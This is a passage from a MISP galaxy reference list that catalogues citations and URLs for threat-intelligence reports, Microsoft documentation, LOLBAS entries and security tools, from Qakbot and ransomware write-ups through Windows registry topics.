Table 15069. Table References

Links

https://github.com/nettitude/PoshC2_Python

Trend Micro Qakbot December 2020

Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Trend Micro Qakbot December 2020"

Table 15070. Table References

Links

https://success.trendmicro.com/solution/000283381

Cyberint Qakbot May 2021

Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Cyberint Qakbot May 2021"

Table 15071. Table References

Links

https://blog.cyberint.com/qakbot-banking-trojan

Kroll Qakbot June 2020

Sette, N. et al. (2020, June 4). Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Kroll Qakbot June 2020"

Table 15072. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks

Trend Micro Qakbot May 2020

Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Trend Micro Qakbot May 2020"

Table 15073. Table References

Links

https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files

Kaspersky QakBot September 2021

Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Kaspersky QakBot September 2021"

Table 15074. Table References

Links

https://securelist.com/qakbot-technical-analysis/103931/

Red Canary Qbot

Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Red Canary Qbot"

Table 15075. Table References

Links

https://redcanary.com/threat-detection-report/threats/qbot/

TheEclecticLightCompany Quarantine and the flag

hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="TheEclecticLightCompany Quarantine and the flag"

Table 15076. Table References

Links

https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/

GitHub QuasarRAT

MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="GitHub QuasarRAT"

Table 15077. Table References

Links

https://github.com/quasar/QuasarRAT

0DAY IN {REA_TEAM} Pikabot January 6 2024

0DAY IN {REA_TEAM}. (2024, January 6). [QuickNote] Technical Analysis of recent Pikabot Core Module. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="0DAY IN {REA_TEAM} Pikabot January 6 2024"

Table 15078. Table References

Links

https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/

DidierStevens SelectMyParent Nov 2009

Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="DidierStevens SelectMyParent Nov 2009"

Table 15079. Table References

Links

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

Microsoft - Azure AD App Registration - May 2019

Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - Azure AD App Registration - May 2019"

Table 15080. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app

Microsoft Azure Key Vault

Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Key Vault"

Table 15081. Table References

Links

https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli

Google Command Center Dashboard

Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Google Command Center Dashboard"

Table 15082. Table References

Links

https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard

Trend Micro R980 2016

Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.

The tag is: misp-galaxy:references="Trend Micro R980 2016"

Table 15083. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/

Costa AvosLocker May 2022

Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Costa AvosLocker May 2022"

Table 15084. Table References

Links

https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory

Sekoia.io Raccoon Stealer June 28 2022

Quentin Bourgue, Pierre Le Bourhis, Threat & Detection Research Team - TDR. (2022, June 28). Raccoon Stealer v2 – Part 1: The return of the dead. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Sekoia.io Raccoon Stealer June 28 2022"

Table 15085. Table References

Links

https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/

DOJ Iran Indictments March 2018

DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.

The tag is: misp-galaxy:references="DOJ Iran Indictments March 2018"

Table 15086. Table References

Links

https://www.justice.gov/usao-sdny/press-release/file/1045781/download

Sophos Ragnar May 2020

SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="Sophos Ragnar May 2020"

Table 15087. Table References

Links

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

GitHub Raindance

Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="GitHub Raindance"

Table 15088. Table References

Links

https://github.com/True-Demon/raindance

Symantec RAINDROP January 2021

Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.

The tag is: misp-galaxy:references="Symantec RAINDROP January 2021"

Table 15089. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

Eset Ramsay May 2020

Sanmillan, I.. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Eset Ramsay May 2020"

Table 15090. Table References

Links

https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/

Rancor Unit42 June 2018

Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Rancor Unit42 June 2018"

Table 15091. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

FBI-ransomware

FBI. (n.d.). Ransomware. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="FBI-ransomware"

Table 15092. Table References

Links

https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf

Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="IBM Ransomware Trends September 2020"

Table 15093. Table References

Links

https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/

DHS/CISA Ransomware Targeting Healthcare October 2020

DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="DHS/CISA Ransomware Targeting Healthcare October 2020"

Table 15094. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-302a

FireEye Ransomware Feb 2020

Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="FireEye Ransomware Feb 2020"

Table 15095. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

FireEye Ransomware Disrupt Industrial Production

Zafra, D. Lunden, K. Brubaker, N. Kennelly, J.. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="FireEye Ransomware Disrupt Industrial Production"

Table 15096. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

Check Point Pay2Key November 2020

Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.

The tag is: misp-galaxy:references="Check Point Pay2Key November 2020"

Table 15097. Table References

Links

https://research.checkpoint.com/2020/ransomware-alert-pay2key/

Microsoft Ransomware as a Service

Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Microsoft Ransomware as a Service"

Table 15098. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

McAfee Maze March 2020

Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="McAfee Maze March 2020"

Table 15099. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

Sophos SystemBC December 16 2020

Sivagnanam Gn, Sean Gallagher. (2020, December 16). Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Sophos SystemBC December 16 2020"

Table 15100. Table References

Links

https://news.sophos.com/en-us/2020/12/16/systembc/

Trend Micro AvosLocker Apr 2022

Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Trend Micro AvosLocker Apr 2022"

Table 15101. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

Trend Micro Black Basta Spotlight September 2022

Trend Micro. (2022, September 1). Ransomware Spotlight Black Basta. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta Spotlight September 2022"

Table 15102. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

Trend Micro LockBit Spotlight February 08 2023

Trend Micro Research. (2022, February 8). Ransomware Spotlight: LockBit. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Trend Micro LockBit Spotlight February 08 2023"

Table 15103. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

Trend Micro Play Spotlight July 21 2023

Trend Micro Research. (2023, July 21). Ransomware Spotlight: Play. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Spotlight July 21 2023"

Table 15104. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play

Group IB Ransomware May 2020

Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="Group IB Ransomware May 2020"

Table 15105. Table References

Links

https://www.group-ib.com/whitepapers/ransomware-uncovered.html

GitHub ransomwatch

joshhighet. (n.d.). ransomwatch. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="GitHub ransomwatch"

Table 15106. Table References

Links

https://github.com/joshhighet/ransomwatch

PyPI RAR

mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="PyPI RAR"

Table 15107. Table References

Links

https://pypi.org/project/rarfile/

WinRAR Homepage

  1. Roshal. (2020). RARLAB. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="WinRAR Homepage"

Table 15108. Table References

Links

https://www.rarlab.com/

Aquino RARSTONE

Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="Aquino RARSTONE"

Table 15109. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/

Rasautou.exe - LOLBAS Project

LOLBAS. (2020, January 10). Rasautou.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rasautou.exe - LOLBAS Project"

Table 15110. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rasautou/

Red Canary Raspberry Robin May 2022

Lauren Podber, Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Red Canary Raspberry Robin May 2022"

Table 15111. Table References

Links

https://redcanary.com/blog/raspberry-robin/

Microsoft Security Raspberry Robin October 2022

Microsoft Threat Intelligence. (2022, October 27). Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Microsoft Security Raspberry Robin October 2022"

Table 15112. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Dragos Raspite Aug 2018

Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.

The tag is: misp-galaxy:references="Dragos Raspite Aug 2018"

Table 15113. Table References

Links

https://www.dragos.com/blog/20180802Raspite.html

RATANKBA

Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="RATANKBA"

Table 15114. Table References

Links

https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html

TrendMicro RawPOS April 2015

TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="TrendMicro RawPOS April 2015"

Table 15115. Table References

Links

http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf

Rclone

Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Rclone"

Table 15116. Table References

Links

https://rclone.org

Rclone Wars

Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Rclone Wars"

Table 15117. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

rcsi.exe - LOLBAS Project

LOLBAS. (2018, May 25). rcsi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="rcsi.exe - LOLBAS Project"

Table 15118. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/

RDP Hijacking Medium

Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="RDP Hijacking Medium"

Table 15119. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

RDPWrap Github

Stas’M Corp. (2014, October 22). RDP Wrapper Library by Stas’M. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="RDPWrap Github"

Table 15120. Table References

Links

https://github.com/stascorp/rdpwrap

rdrleakdiag.exe - LOLBAS Project

LOLBAS. (2022, May 18). rdrleakdiag.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="rdrleakdiag.exe - LOLBAS Project"

Table 15121. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/

ESET RTM Feb 2017

Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="ESET RTM Feb 2017"

Table 15122. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

FireEye Sunshop Campaign May 2013

Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="FireEye Sunshop Campaign May 2013"

Table 15123. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

Mandiant golang stripped binaries explanation

STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="Mandiant golang stripped binaries explanation"

Table 15124. Table References

Links

https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery

reagentc_cmd

Microsoft, EliotSeattle, et al. (2022, August 18). REAgentC command-line options. Retrieved October 19, 2022.

The tag is: misp-galaxy:references="reagentc_cmd"

Table 15125. Table References

Links

https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11

Microsoft DART Case Report 001

Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Microsoft DART Case Report 001"

Table 15126. Table References

Links

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

Sans ARP Spoofing Aug 2003

Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Sans ARP Spoofing Aug 2003"

Table 15127. Table References

Links

https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411

Github CLI Create Webhook

Github. (n.d.). Receiving webhooks with the GitHub CLI. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Github CLI Create Webhook"

Table 15128. Table References

Links

https://docs.github.com/en/webhooks-and-events/webhooks/receiving-webhooks-with-the-github-cli

Kaspersky Cloud Atlas August 2019

GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Kaspersky Cloud Atlas August 2019"

Table 15129. Table References

Links

https://securelist.com/recent-cloud-atlas-activity/92016/

Talos MuddyWater May 2019

Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="Talos MuddyWater May 2019"

Table 15130. Table References

Links

https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html

Free Desktop Entry Keys

Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Free Desktop Entry Keys"

Table 15131. Table References

Links

https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html

Recorded Future APT3 May 2017

Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="Recorded Future APT3 May 2017"

Table 15132. Table References

Links

https://www.recordedfuture.com/chinese-mss-behind-apt3/

Trend Micro Daserf Nov 2017

Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Trend Micro Daserf Nov 2017"

Table 15133. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

RHEL auditd

Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="RHEL auditd"

Table 15134. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

Red Hat System Auditing

Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Red Hat System Auditing"

Table 15135. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

Cylance Redirect to SMB

Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Cylance Redirect to SMB"

Table 15136. Table References

Links

https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf

Black Hills Red Teaming MS AD Azure, 2018

Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Black Hills Red Teaming MS AD Azure, 2018"

Table 15137. Table References

Links

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

OutFlank System Calls

de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="OutFlank System Calls"

Table 15138. Table References

Links

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

US-CERT TA17-156A SNMP Abuse 2017

US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT TA17-156A SNMP Abuse 2017"

Table 15139. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/TA17-156A

Cloudflare ReflectionDoS May 2017

Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare ReflectionDoS May 2017"

Table 15140. Table References

Links

https://blog.cloudflare.com/reflections-on-reflections/

Trend Micro

Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Trend Micro"

Table 15141. Table References

Links

https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html

Microsoft Reg

Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="Microsoft Reg"

Table 15142. Table References

Links

https://technet.microsoft.com/en-us/library/cc732643.aspx

LOLBAS Regasm

LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regasm"

Table 15143. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

MSDN Regasm

Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN Regasm"

Table 15144. Table References

Links

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Microsoft RegDelNull July 2016

Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Microsoft RegDelNull July 2016"

Table 15145. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull

Regedit.exe - LOLBAS Project

LOLBAS. (2018, May 25). Regedit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Regedit.exe - LOLBAS Project"

Table 15146. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

Reg.exe - LOLBAS Project

LOLBAS. (2018, May 25). Reg.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Reg.exe - LOLBAS Project"

Table 15147. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Reg/

Microsoft Reghide NOV 2006

Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Microsoft Reghide NOV 2006"

Table 15148. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/reghide

Regini.exe - LOLBAS Project

LOLBAS. (2020, July 3). Regini.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Regini.exe - LOLBAS Project"

Table 15149. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

Register-cimprovider.exe - LOLBAS Project

LOLBAS. (2018, May 25). Register-cimprovider.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Register-cimprovider.exe - LOLBAS Project"

Table 15150. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/

Microsoft Registry

Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft Registry"

Table 15151. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry

Tilbury 2014

Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Tilbury 2014"

Table 15152. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

Microsoft COR_PROFILER Feb 2013

Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Microsoft COR_PROFILER Feb 2013"

Table 15153. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)

Microsoft Registry Auditing Aug 2016

Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Registry Auditing Aug 2016"

Table 15154. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

MSDN Registry Key Security

Microsoft. (n.d.). Registry Key Security and Access Rights. Retrieved March 16, 2017.

The tag is: misp-galaxy:references="MSDN Registry Key Security"

Table 15155. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx

Registry Key Security

Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.

The tag is: misp-galaxy:references="Registry Key Security"

Table 15156. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN

Microsoft Registry Drivers

Microsoft. (2021, December 14). Registry Trees for Devices and Drivers. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft Registry Drivers"

Table 15157. Table References

Links

https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys

Microsoft System Wide Com Keys

Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft System Wide Com Keys"

Table 15158. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

LOLBAS Regsvcs

LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regsvcs"

Table 15159. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

MSDN Regsvcs

Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN Regsvcs"

Table 15160. Table References

Links

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

LOLBAS Regsvr32

LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regsvr32"

Table 15161. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

Fortinet Remcos Feb 2017

Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Fortinet Remcos Feb 2017"

Table 15162. Table References

Links

https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html

Mandiant Remediation and Hardening Strategies for Microsoft 365

Mandiant. (2022, August). Remediation and Hardening Strategies for Microsoft 365 to Defend Against APT29. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Mandiant Remediation and Hardening Strategies for Microsoft 365"

Table 15163. Table References

Links

https://www.mandiant.com/sites/default/files/2022-08/remediation-hardening-strategies-for-m365-defend-against-apt29-white-paper.pdf

Mandiant Defend UNC2452 White Paper

Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Mandiant Defend UNC2452 White Paper"

Table 15164. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf

Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452

Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.

The tag is: misp-galaxy:references="Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452"

Table 15165. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html

TechNet Remote Desktop Services

Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="TechNet Remote Desktop Services"

Table 15166. Table References

Links

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Remote.exe - LOLBAS Project

LOLBAS. (2021, June 1). Remote.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Remote.exe - LOLBAS Project"

Table 15167. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/

Microsoft Remote Use of Local

Margosis, A.. (2018, December 10). Remote Use of Local Accounts: LAPS Changes Everything. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Remote Use of Local"

Table 15168. Table References

Links

https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-everything/

SigmaHQ

Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="SigmaHQ"

Table 15169. Table References

Links

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

disable_win_evt_logging

Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="disable_win_evt_logging"

Table 15170. Table References

Links

https://ptylu.github.io/content/report/report.html?report=25

Microsoft Replace Process Token

Brower, N., Lich, B. (2017, April 19). Replace a process level token. Retrieved December 19, 2017.

